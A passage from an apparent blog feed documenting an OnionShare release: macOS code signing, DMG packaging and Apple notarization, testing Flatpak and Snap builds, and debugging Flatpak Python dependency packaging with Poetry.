<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/meek-client"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/obfs4proxy"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/snowflake-client"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/tor"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/libevent-2.1.7.dylib"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/onionshare"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/onionshare-cli"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">,</span>
<span class="p">],</span>
<span class="p">):</span>
<span class="n">sign</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">entitlements_plist_path</span><span class="p">,</span> <span class="n">identity_name_application</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"> Signed app bundle: </span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</pre></div>
<p>This code basically signs all of the <code>.so</code> files in the app bundle, signs all of the <code>.dylib</code> files, and then goes and signs a bunch of individual Mach-O binaries, and finally the app bundle itself. I forgot why this was necessary, other than just signing the app bundle itself would miss some of the binaries.</p>
<p>The problem is that with the new versions of PySide6 and cx_Freeze, these files have all moved around. Hmm, maybe I can solve this problem by writing code that just searches for all Mach-O binaries and signs them, so it will work in the future no matter the future file structure. In fact, I already wrote a function that finds these binaries in <code>macos-merge-universal.py</code>, the <code>get_binary_arches()</code> function.</p>
<p>In <code>desktop/scripts</code>, I made a new file called <code>common.py</code> and moved the <code>get_binary_arches()</code> function into it. I deleted the function from <code>macos-merge-universal.py</code>, and instead just imported it at the top:</p>
<div class="hll"><pre><span></span><span class="kn">from</span> <span class="nn">common</span> <span class="kn">import</span> <span class="n">get_binary_arches</span>
</pre></div>
<p>I also imported <code>get_binary_arches</code> in <code>build-macos.py</code>, and I updated the <code>codesign()</code> function to just be this:</p>
<div class="hll"><pre><span></span><span class="nd">@main</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"app_path"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">codesign</span><span class="p">(</span><span class="n">app_path</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Sign macOS binaries before packaging"""</span>
<span class="n">bin_universal</span><span class="p">,</span> <span class="n">bin_silicon</span><span class="p">,</span> <span class="n">bin_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">app_path</span><span class="p">)</span>
<span class="n">binaries</span> <span class="o">=</span> <span class="n">bin_universal</span> <span class="o">+</span> <span class="n">bin_silicon</span> <span class="o">+</span> <span class="n">bin_intel</span> <span class="o">+</span> <span class="p">[</span><span class="n">app_path</span><span class="p">]</span>
<span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">binaries</span><span class="p">:</span>
<span class="n">sign</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">entitlements_plist_path</span><span class="p">,</span> <span class="n">identity_name_application</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"> Signed app bundle: </span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</pre></div>
<p>This now individually signs every binary, and then signs the app bundle itself. Let's see if it works:</p>
<pre><code>% poetry run python ./scripts/build-macos.py codesign ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/MacOS/onionshare'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/MacOS/onionshare: replacing existing signature
--snip--
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app: replacing existing signature
> Signed app bundle: /Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app
</code></pre>
<p>I now have a code-signed app bundle.</p>
<h4 id="packaging-the-app">Packaging the app</h4><p>Now that I have a code-signed universal2 binary, I need to package it into a DMG for distribution--one of those things that you can open and then drag an app into Applications. OnionShare uses <a href="https://github.com/create-dmg/create-dmg">create-dmg</a> to make this simple.</p>
<pre><code>% poetry run python ./scripts/build-macos.py package ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
> Create DMG
--snip--
Disk image done
> Finished building DMG: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
</code></pre>
<p>I have <code>OnionShare-2.6.1.dev1.dmg</code>. The final step is to notarize it.</p>
<h4 id="notarizing-the-app">Notarizing the app</h4><p>For the last few years, Apple has been requiring all apps to get notarized. This means developers need to upload their app to Apple's notarization service which thoroughly scans it and makes sure it complies with Apple's security policies (for example, requiring that everything is code signed).</p>
<p>If it fails Apple's notarization, you get a report that explains what's wrong with it, and Mac users can't run your app. If it passes, you get a notarization "ticket". If someone tries running the app, macOS will query their notarization service to see if there's a valid ticket, and if there is it will let the app proceed. But to avoid having macOS querying Apple's service, you can "staple" the "ticket" to the app, so that macOS already knows it's passed notarization.</p>
<p>So, following the instructions in <code>RELEASE.md</code>, I uploaded the DMG to Apple's notarization service:</p>
<div class="hll"><pre><span></span>xcrun<span class="w"> </span>altool<span class="w"> </span>--notarize-app<span class="w"> </span>--primary-bundle-id<span class="w"> </span><span class="s2">"com.micahflee.onionshare"</span><span class="w"> </span>-u<span class="w"> </span><span class="s2">"micah@micahflee.com"</span><span class="w"> </span>-p<span class="w"> </span><span class="s2">"</span><span class="nv">$APPLE_PASSWORD</span><span class="s2">"</span><span class="w"> </span>--file<span class="w"> </span>dist/OnionShare-<span class="nv">$VERSION</span>.dmg
</pre></div>
<p>In this case, <code>$APPLE_PASSWORD</code> is an app-specific password for my Apple ID account, and <code>$VERSION</code> is <code>v2.6.1.dev1</code>. This command took a few minutes to run because it had to upload the 209MB DMG to Apple's service. Now that it's done uploading, we wait.</p>
<p><img src="apple-notarization-email.png" alt="Email from Apple's notarization service"></p>
<p>It passed notarization! Now I just need to staple the ticket.</p>
<pre><code>% xcrun stapler staple dist/OnionShare-$VERSION.dmg
Processing: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
Processing: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
The staple and validate action worked!
</code></pre>
<h4 id="testing-it-out">Testing it out</h4><p>On my old Intel Mac, I double-clicked on <code>OnionShare-2.6.1.dev1.dmg</code> and dragged OnionShare into Applications. I then went to Applications and double-clicked on OnionShare, and the OnionShare window opened. I clicked around, and everything seems to work!</p>
<p>I copied the DMG to my Apple Silicon Mac and did the same: I opened the DMG, dragged the app into Applications, and then ran it, and it worked there too!</p>
<p>The macOS development release is done.</p>
<h3 id="testing-flatpak">Testing Flatpak</h3><p>sh the Flatpak package to Flathub and I publish the Snapcraft package to snapcraft.io, the central repository. But I also distribute signed <code>.flatpak</code> and <code>.snap</code> files for people to download and install if they prefer. Both of these files are generated by the GitHub Actions workflow.</p>
<p>On my Ubuntu computer, I found the GitHub Actions workflow and downloaded flatpak-build.zip. I unzipped it found OnionShare.flatpak. I installed it by running:</p>
<div class="hll"><pre><span></span>flatpak<span class="w"> </span>install<span class="w"> </span>./OnionShare.flatpak
</pre></div>
<p>To install it, you still need to download many dependencies from Flathub. Once it's installed, I ran it with:</p>
<div class="hll"><pre><span></span>flatpak<span class="w"> </span>run<span class="w"> </span>org.onionshare.OnionShare
</pre></div>
<p>The OnionShare window opened and everything seems to work.</p>
<h3 id="testing-snapcraft">Testing Snapcraft</h3><p>I found the GitHub Actions workflow and downloaded <code>snapcraft-build.zip</code>. I unzipped it found <code>onionshare_2.6.1.dev1_amd64.snap</code>. I installed it by running:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>--devmode<span class="w"> </span>./onionshare_2.6.1.dev1_amd64.snap
</pre></div>
<p>Once it was installed, I ran it with:</p>
<div class="hll"><pre><span></span>/snap/bin/onionshare
</pre></div>
<p>The OnionShare window opened and everything seems to work.</p>
<h2 id="onionshare-v2-6-1-dev1-released">OnionShare v2.6.1.dev1 released</h2><p>And with that, I've made a development release! You can find the MSI Windows installer, the DMG macOS installer, and the Flatpak and Snapcraft packages, here: <a href="https://github.com/onionshare/onionshare/releases/tag/v2.6.1.dev1">https://github.com/onionshare/onionshare/releases/tag/v2.6.1.dev1</a></p>
<p>If you're curious, go ahead and test them out, and submit any bugs you find by <a href="https://web.archive.org/web/20231028233436/https://github.com/onionshare/onionshare/issues/new">opening GitHub issues</a>.</p>
<p>Whew, this has been a ridiculous process, but I'm glad it's nearly done! I expect part 4 will be the final part in this epic saga, and also hopefully it will be <em>much</em> shorter, because all I'll need to do in it is make the final release (unless typing those words already jinxed it).</p>
What goes into making an OnionShare release: Part 22023-09-29T00:00:00ZMicah Leeurn:uuid:7559d210-ffe4-3a46-a1b8-70f8f34e4def<p>A few weeks ago I intended to make an OnionShare release, documenting the entire arduous process. I made a lot of progress, but then ran into endless problems getting the Flatpak packaging working and so decided to delay the release. Now I'm back at it. In this post I will finish tackling Flatpak and start tackling the Windows and macOS releases.</p>
<p>If you haven't read <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1 of this series</a>, you might want to check it out now. I describe how I started making the release. I merged in translations from Weblate and made sure the correct translations were enabled for the desktop app and the documentation. After some struggling I got the Snapcraft release working--this involved upgrading the snap base from <code>core20</code> to <code>core22</code> so that I could upgrade the from PySide2 to PySide6. I then ran into a wall trying to get Flatpak working.</p>
<p>⚠️ <em>WARNING:</em> This blog post may make you want to smash your face against your keyboard due to the sheer volume of technical issues, error messages, and general injury to morale. I received feedback that the last blog post should have contained a similar warning, so I didn't want to repeat the same mistake.</p>
<p>Like part 1, this blog post is also <em>stupidly long</em>. And also like part 1, I didn't actually finish the release like I was hoping to, so expect a part 3. Here's a table of contents for this post:</p>
<ul>
<li><a href="#finishing-the-flatpak-release">Finishing the Flatpak release</a><ul>
<li><a href="#stopping-using-poetry-with-flatpak">Stopping using Poetry with Flatpak</a></li>
<li><a href="#fixing-the-cli-python-packaging-issues">Fixing the CLI Python packaging issues</a></li>
</ul>
</li>
<li><a href="#updating-dependencies-again">Updating dependencies again</a></li>
<li><a href="#building-onionshare-for-windows">Building OnionShare for Windows</a><ul>
<li><a href="#debugging-windows-build-in-github-actions">Debugging Windows build in GitHub Actions</a></li>
<li><a href="#setting-up-windows-for-onionshare-development">Setting up Windows for OnionShare development</a></li>
<li><a href="#debugging-windows-build-in-github-actions-some-more">Debugging Windows build in GitHub Actions some more</a></li>
<li><a href="#testing-the-windows-binary-from-github-actions">Testing the Windows binary from GitHub Actions</a></li>
</ul>
</li>
<li><a href="#building-onionshare-for-macos">Building OnionShare for macOS</a><ul>
<li><a href="#setting-up-macos-for-onionshare-development">Setting up macOS for OnionShare development</a></li>
<li><a href="#building-the-macos-app-bundle">Building the macOS app bundle</a></li>
</ul>
</li>
<li><a href="#time-to-take-a-break">Time to take a break</a></li>
</ul>
<p>I'll start where I left off, with Flatpak.</p>
<h2 id="finishing-the-flatpak-release">Finishing the Flatpak release</h2><p>When I left off a few weeks ago, I had made some progress with the Flatpak release, updating <code>pyside6</code> and <code>tor</code>. But I got seriously stuck on compiling <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code> -- these are all Tor pluggable transports programmed in Go, and they're used to bypass censorship on networks where access to the Tor network is blocked.</p>
<p>When you need to add Go dependencies to Flatpak, you're supposed to use a script in the <a href="https://github.com/flatpak/flatpak-builder-tools">flatpak-builder-tools</a> project to help you write the Flatpak manifest file, but it turns out that due to changes in the Go ecosystem, the script was entirely broken. I spend many hours completely rewriting it (here is my <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">pull request</a>), but still I ran into problems, and ultimately decided to just not update these dependencies for this release, leaving this as a future Micah problem.</p>
<p>I then found that the Flatpak package was failing to build because of some changes in Python with the <code>onionshare-cli</code> (the command line version of OnionShare) and <code>onionshare</code> (the desktop version) parts. It turns out, installing these Python projects like this was deprecated:</p>
<div class="hll"><pre><span></span>python3<span class="w"> </span>setup.py<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span>
</pre></div>
<p>And I had to replace it with this:</p>
<div class="hll"><pre><span></span>pip3<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--no-deps<span class="w"> </span>.
</pre></div>
<p>After this, I had tried building the Flatpak package, and hit the following error in the <code>onionshare-cli</code> part:</p>
<pre><code>$ flatpak-builder build --force-clean --jobs=$(nproc) --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
ERROR: Could not find a version that satisfies the requirement poetry-core (from versions: none)
ERROR: No matching distribution found for poetry-core
--snip--
</code></pre>
<p>That's where I gave up. Now that I'm back, I have an idea.</p>
<h3 id="stopping-using-poetry-with-flatpak">Stopping using Poetry with Flatpak</h3><p>OnionShare uses Poetry to manage its dependencies, but you can't use Poetry with Flatpak. Instead, in the Flatpak manifest file you have to define URLs and SHA256 checksums of every Python dependency, and install them from there.</p>
<p>Since I changed from directly running <code>python3 setup.py install</code> to using <code>pip3 install</code>, I think the problem is that <code>pip3</code> is looking at the <code>pyproject.toml</code> file for figuring out how to install it, and from there it can see that dependencies are managed by Poetry. I think the simplest solution is to just delete the <code>pyproject.toml</code> file before running <code>pip3 install</code>.</p>
<p>So I updated the <code>onionshare-cli</code> part from this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
</pre></div>
<p>To this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">rm cli/pyproject.toml</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
</pre></div>
<p>Similarly, for the <code>onionshare</code> part, I added <code>rm desktop/pyproject.toml</code> in the <code>build-commands</code> list.</p>
<p>Then I tried building it again:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
</code></pre>
<p>It worked without error this time. What happens when I run it?</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
File "/app/bin/onionshare", line 5, in <module>
from onionshare import main
File "/app/lib/python3.10/site-packages/onionshare/__init__.py", line 34, in <module>
from onionshare_cli.common import Common
File "/app/lib/python3.10/site-packages/onionshare_cli/__init__.py", line 30, in <module>
from .web import Web
File "/app/lib/python3.10/site-packages/onionshare_cli/web/__init__.py", line 21, in <module>
from .web import Web
File "/app/lib/python3.10/site-packages/onionshare_cli/web/web.py", line 26, in <module>
from packaging.version import Version
ModuleNotFoundError: No module named 'packaging'
</code></pre>
<h3 id="fixing-the-cli-python-packaging-issues">Fixing the CLI Python packaging issues</h3><p>The <code>onionshare-cli</code> package is missing the <code>packaging</code> Python dependency. So, I added that dependency to the CLI project:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli
poetry<span class="w"> </span>add<span class="w"> </span>packaging
</pre></div>
<p>And then, using the <code>poetry-to-requirements.py</code> that I <a href="../what-goes-into-making-an-onionshare-release/#adding-poetry-to-requirements-txt-script">programmed and described</a> in part 1, I rebuilt the <code>onionshare-cli</code> dependencies:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>~/code/flatpak-builder-tools/pip/
./flatpak-pip-generator<span class="w"> </span><span class="k">$(</span>../../onionshare/flatpak/poetry-to-requirements.py<span class="w"> </span>../../onionshare/cli/pyproject.toml<span class="k">)</span>
../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>I then updated the Flatpak manifest to use the dependencies in <code>onionshare-cli.yaml</code>, and rebuilt and installed the Flatpak package, and tried running it again. This time, it failed with another import:</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
File "/app/bin/onionshare", line 5, in <module>
from onionshare import main
File "/app/lib/python3.10/site-packages/onionshare/__init__.py", line 34, in <module>
from onionshare_cli.common import Common
File "/app/lib/python3.10/site-packages/onionshare_cli/__init__.py", line 31, in <module>
from .onion import TorErrorProtocolError, TorTooOldEphemeral, TorTooOldStealth, Onion
File "/app/lib/python3.10/site-packages/onionshare_cli/onion.py", line 27, in <module>
import nacl.public
File "/app/lib/python3.10/site-packages/nacl/public.py", line 16, in <module>
import nacl.bindings
File "/app/lib/python3.10/site-packages/nacl/bindings/__init__.py", line 16, in <module>
from nacl.bindings.crypto_aead import (
File "/app/lib/python3.10/site-packages/nacl/bindings/crypto_aead.py", line 17, in <module>
from nacl._sodium import ffi, lib
ModuleNotFoundError: No module named 'nacl._sodium'
</code></pre>
<p>It looks like for some reason the flatpak-builder-tools PIP generator script isn't working to properly install PyNaCl, a cryptography library that OnionShare uses.</p>
<p>While I was writing my first blog post about this release, I opened a <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">bug report</a> in the flatpak-builder-tools repo explaining that the Poetry lockfile generator was broken. Longtime OnionShare developer Miguel Jacq posted a <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371#issuecomment-1716841714">comment</a> on that bug report pointing to a <a href="https://github.com/flatpak/flatpak-builder-tools/pull/353">pull request</a> in the flatpak-builder-tools repo which actually fixed the issue, but hadn't yet been approved and merged. (Welcome to the world of open source software development.)</p>
<p>Since I was having trouble with the PIP generator, I figured maybe the patched Poetry lockfile generator would work. So, in my <code>flatpak-builder-tools/poetry</code> folder I patched <code>flatpak-poetry-generator.py</code> to match what's in that PR, and then I used it to generate the dependencies:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>flatpak-builder-tools/poetry
./flatpak-poetry-generator.py<span class="w"> </span>--production<span class="w"> </span>../../onionshare/cli/poetry.lock
../flatpak-json2yaml.py<span class="w"> </span>generated-poetry-sources.json
mv<span class="w"> </span>generated-poetry-sources.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>Now, <code>onionshare-cli.yaml</code> has a block of code that should define all of the dependencies, and it starts like this:</p>
<div class="hll"><pre><span></span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">poetry-deps</span>
<span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST}</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bidict blinker brotli certifi cffi charset-normalizer click colorama cython dnspython</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">eventlet exceptiongroup flask flask-compress flask-socketio gevent gevent-websocket</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">greenlet idna importlib-metadata iniconfig itsdangerous jinja2 markupsafe packaging</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pluggy psutil pycparser pynacl pysocks pytest python-engineio python-socketio</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">requests setuptools six stem tomli unidecode urllib3 waitress werkzeug zipp zope-event</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">zope-interface</span>
<span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/b5/82/ce0b6380f35f49d3fe687979a324c342cfa3588380232f3801db9dd62f9e/bidict-0.22.1-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b</span>
<span class="l l-Scalar l-Scalar-Plain">--snip--</span>
</pre></div>
<p>I added this to the Flatpak manifest file, replacing the dependencies for the <code>onionshare-cli</code>, and tried to build the Flatpak package again. This time, it failed to finish building:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Processing ./gevent-23.9.0.post1.tar.gz
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [4 lines of output]
Looking in links: file:///run/build/poetry-deps
Processing ./setuptools-68.1.2-py3-none-any.whl
ERROR: Could not find a version that satisfies the requirement Cython>=3.0.2 (from versions: none)
ERROR: No matching distribution found for Cython>=3.0.2
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
Error: module poetry-deps: Child process exited with code 1
</code></pre>
<p>It needs <code>Cython>=3.0.2</code>, and somehow the Poetry lockfile generator didn't detect this. No worries, I'll just add it. Back in the <code>cli</code> folder I added it by running:</p>
<pre><code>$ poetry add Cython
Using version ^3.0.2 for cython
Updating dependencies
Resolving dependencies... Downloading https://files.pythonhosted.org/packages/03/e9/9cc0c4f0d8a566089d0962Resolving dependencies... Downloading https://files.pythonhosted.org/packages/03/e9/9cc0c4f0d8a566089d0962Resolving dependencies... Downloading https://files.pythonhosted.org/packages/03/e9/9cc0c4f0d8a566089d0962Resolving dependencies... (0.5s)
Package operations: 1 install, 0 updates, 0 removals
• Installing cython (3.0.2)
</code></pre>
<p>Then I used the Poetry lockfile generator to rebuild the deps, added them to the Flatpak manifest file, and tried building it again. And it failed again. Here's the relevant error message this time:</p>
<pre><code>Processing ./gevent-23.9.0.post1.tar.gz
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [8 lines of output]
Looking in links: file:///run/build/poetry-deps
Processing ./setuptools-68.1.2-py3-none-any.whl
Processing ./Cython-3.0.2-py2.py3-none-any.whl
Processing ./cffi-1.15.1.tar.gz
Preparing metadata (setup.py): started
Preparing metadata (setup.py): finished with status 'done'
ERROR: Could not find a version that satisfies the requirement greenlet>=3.0rc1 (from versions: 2.0.2)
ERROR: No matching distribution found for greenlet>=3.0rc1
[end of output]
</code></pre>
<p>Ugh. Okay instead of tediously documenting each little thing I try, I'm going to take a break from blogging and focus on just fixing this problem...</p>
<p>🎵 Debugging noises... 🎵</p>
<p>Got it working! Ultimately, I had to add the following Poetry dependencies to the <code>onionshare-cli</code> project:</p>
<pre><code>packaging = "^23.1"
gevent = "^23.9.1"
wheel = "^0.41.2"
cffi = "^1.15.1"
cython = "^3.0.2"
</code></pre>
<p>Also, after running <code>poetry add</code> to add dependencies, for some reason <code>greenlet</code> kept getting upgraded to version 3.0.0rc3. But when I run <code>poetry update</code>, it would then downgrade to the latest stable version, 2.0.2, which is what I want. I don't understand the byzantine network of dependency relationships that Poetry is unraveling, but at least I got it working.</p>
<p>And I also had to modify the output from the Poetry lockfile generator. It kept crashing while trying to installing the <code>brotlicffi</code> package with an error message that included this:</p>
<pre><code>********************************************************************************
Requirements should be satisfied by a PEP 517 installer.
If you are using pip, you can try `pip install --use-pep517`.
********************************************************************************
</code></pre>
<p>So, I modified the <code>onionshare-cli</code> part to first explicitly install <code>brotlicffi</code> by running this:</p>
<div class="hll"><pre><span></span>pip3<span class="w"> </span>install<span class="w"> </span>--no-index<span class="w"> </span>--find-links<span class="o">=</span><span class="s2">"file://</span><span class="si">${</span><span class="nv">PWD</span><span class="si">}</span><span class="s2">"</span><span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--use-pep517<span class="w"> </span>brotlicffi
</pre></div>
<p>And then continue on with installing the rest of the Python packages like normal. Here's what the <code>onionshare-cli</code> part of the Flatpak manifest file looked like:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">rm cli/pyproject.toml</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">dir</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">..</span>
<span class="w"> </span><span class="c1"># - type: git</span>
<span class="w"> </span><span class="c1"># url: https://github.com/onionshare/onionshare.git</span>
<span class="w"> </span><span class="c1"># tag: v2.6</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">poetry-deps</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST} --use-pep517 brotlicffi</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST}</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bidict blinker brotli certifi cffi charset-normalizer click colorama</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cython dnspython eventlet exceptiongroup flask flask-compress flask-socketio gevent</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">gevent-websocket greenlet greenlet h11 idna importlib-metadata iniconfig itsdangerous</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">jinja2 markupsafe packaging pluggy psutil pycparser pynacl pysocks pytest python-engineio</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">python-socketio requests setuptools simple-websocket six stem tomli unidecode</span>
